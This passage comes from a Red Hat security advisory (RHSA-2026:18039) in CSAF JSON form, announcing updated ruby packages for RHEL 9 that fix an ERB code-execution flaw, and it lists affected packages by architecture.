|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-doc-0:3.0.7-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-bundler-0:2.2.33-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-irb-0:1.3.5-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-minitest-0:5.14.2-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-power_assert-0:1.2.1-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-rake-0:13.0.3-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-rbs-0:1.4.0-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-rexml-0:3.2.5-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-rss-0:0.2.9-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-test-unit-0:3.3.7-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygem-typeprof-0:0.15.2-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygems-0:3.2.33-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:rubygems-devel-0:3.2.33-166.el9_7.noarch | — |
Vendor Fix
fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for ruby is now available for Red Hat Enterprise Linux 9.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* erb: ERB: Arbitrary code execution via deserialization bypass (CVE-2026-41316)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:18039",
"url": "https://access.redhat.com/errata/RHSA-2026:18039"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2461369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461369"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_18039.json"
}
],
"title": "Red Hat Security Advisory: ruby security update",
"tracking": {
"current_release_date": "2026-05-18T14:18:22+00:00",
"generator": {
"date": "2026-05-18T14:18:22+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:18039",
"initial_release_date": "2026-05-18T12:25:23+00:00",
"revision_history": [
{
"date": "2026-05-18T12:25:23+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-05-18T12:25:23+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-18T14:18:22+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::crb"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.0.7-166.el9_7.x86_64",
"product": {
"name": "ruby-0:3.0.7-166.el9_7.x86_64",
"product_id": "ruby-0:3.0.7-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.0.7-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.0.7-166.el9_7.x86_64",
"product": {
"name": "ruby-devel-0:3.0.7-166.el9_7.x86_64",
"product_id": "ruby-devel-0:3.0.7-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.0.7-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.0.7-166.el9_7.x86_64",
"product": {
"name": "ruby-libs-0:3.0.7-166.el9_7.x86_64",
"product_id": "ruby-libs-0:3.0.7-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.0.7-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64",
"product": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64",
"product_id": "rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.0.0-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.5.7-166.el9_7.x86_64",
"product": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.x86_64",
"product_id": "rubygem-io-console-0:0.5.7-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.5.7-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.5.1-166.el9_7.x86_64",
"product": {
"name": "rubygem-json-0:2.5.1-166.el9_7.x86_64",
"product_id": "rubygem-json-0:2.5.1-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.5.1-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:3.3.2-166.el9_7.x86_64",
"product": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.x86_64",
"product_id": "rubygem-psych-0:3.3.2-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@3.3.2-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.0.7-166.el9_7.x86_64",
"product": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.x86_64",
"product_id": "ruby-debugsource-0:3.0.7-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.0.7-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.x86_64",
"product": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.x86_64",
"product_id": "ruby-debuginfo-0:3.0.7-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.0.7-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64",
"product": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64",
"product_id": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.0.7-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.0.0-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64",
"product_id": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.5.7-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64",
"product": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64",
"product_id": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.5.1-166.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64",
"product": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64",
"product_id": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@3.3.2-166.el9_7?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.0.7-166.el9_7.i686",
"product": {
"name": "ruby-0:3.0.7-166.el9_7.i686",
"product_id": "ruby-0:3.0.7-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.0.7-166.el9_7?arch=i686"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.0.7-166.el9_7.i686",
"product": {
"name": "ruby-devel-0:3.0.7-166.el9_7.i686",
"product_id": "ruby-devel-0:3.0.7-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.0.7-166.el9_7?arch=i686"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.0.7-166.el9_7.i686",
"product": {
"name": "ruby-libs-0:3.0.7-166.el9_7.i686",
"product_id": "ruby-libs-0:3.0.7-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.0.7-166.el9_7?arch=i686"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.0.7-166.el9_7.i686",
"product": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.i686",
"product_id": "ruby-debugsource-0:3.0.7-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.0.7-166.el9_7?arch=i686"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.i686",
"product": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.i686",
"product_id": "ruby-debuginfo-0:3.0.7-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.0.7-166.el9_7?arch=i686"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686",
"product": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686",
"product_id": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.0.7-166.el9_7?arch=i686"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.0.0-166.el9_7?arch=i686"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686",
"product_id": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.5.7-166.el9_7?arch=i686"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686",
"product": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686",
"product_id": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.5.1-166.el9_7?arch=i686"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686",
"product": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686",
"product_id": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@3.3.2-166.el9_7?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.0.7-166.el9_7.s390x",
"product": {
"name": "ruby-0:3.0.7-166.el9_7.s390x",
"product_id": "ruby-0:3.0.7-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.0.7-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.0.7-166.el9_7.s390x",
"product": {
"name": "ruby-devel-0:3.0.7-166.el9_7.s390x",
"product_id": "ruby-devel-0:3.0.7-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.0.7-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.0.7-166.el9_7.s390x",
"product": {
"name": "ruby-libs-0:3.0.7-166.el9_7.s390x",
"product_id": "ruby-libs-0:3.0.7-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.0.7-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x",
"product": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x",
"product_id": "rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.0.0-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.5.7-166.el9_7.s390x",
"product": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.s390x",
"product_id": "rubygem-io-console-0:0.5.7-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.5.7-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.5.1-166.el9_7.s390x",
"product": {
"name": "rubygem-json-0:2.5.1-166.el9_7.s390x",
"product_id": "rubygem-json-0:2.5.1-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.5.1-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:3.3.2-166.el9_7.s390x",
"product": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.s390x",
"product_id": "rubygem-psych-0:3.3.2-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@3.3.2-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.0.7-166.el9_7.s390x",
"product": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.s390x",
"product_id": "ruby-debugsource-0:3.0.7-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.0.7-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.s390x",
"product": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.s390x",
"product_id": "ruby-debuginfo-0:3.0.7-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.0.7-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x",
"product": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x",
"product_id": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.0.7-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.0.0-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x",
"product_id": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.5.7-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x",
"product": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x",
"product_id": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.5.1-166.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x",
"product": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x",
"product_id": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@3.3.2-166.el9_7?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.0.7-166.el9_7.src",
"product": {
"name": "ruby-0:3.0.7-166.el9_7.src",
"product_id": "ruby-0:3.0.7-166.el9_7.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.0.7-166.el9_7?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.0.7-166.el9_7.aarch64",
"product": {
"name": "ruby-0:3.0.7-166.el9_7.aarch64",
"product_id": "ruby-0:3.0.7-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.0.7-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.0.7-166.el9_7.aarch64",
"product": {
"name": "ruby-devel-0:3.0.7-166.el9_7.aarch64",
"product_id": "ruby-devel-0:3.0.7-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.0.7-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.0.7-166.el9_7.aarch64",
"product": {
"name": "ruby-libs-0:3.0.7-166.el9_7.aarch64",
"product_id": "ruby-libs-0:3.0.7-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.0.7-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64",
"product": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64",
"product_id": "rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.0.0-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.5.7-166.el9_7.aarch64",
"product": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.aarch64",
"product_id": "rubygem-io-console-0:0.5.7-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.5.7-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.5.1-166.el9_7.aarch64",
"product": {
"name": "rubygem-json-0:2.5.1-166.el9_7.aarch64",
"product_id": "rubygem-json-0:2.5.1-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.5.1-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:3.3.2-166.el9_7.aarch64",
"product": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.aarch64",
"product_id": "rubygem-psych-0:3.3.2-166.el9_7.aarch64",
"product_identification_helper": {
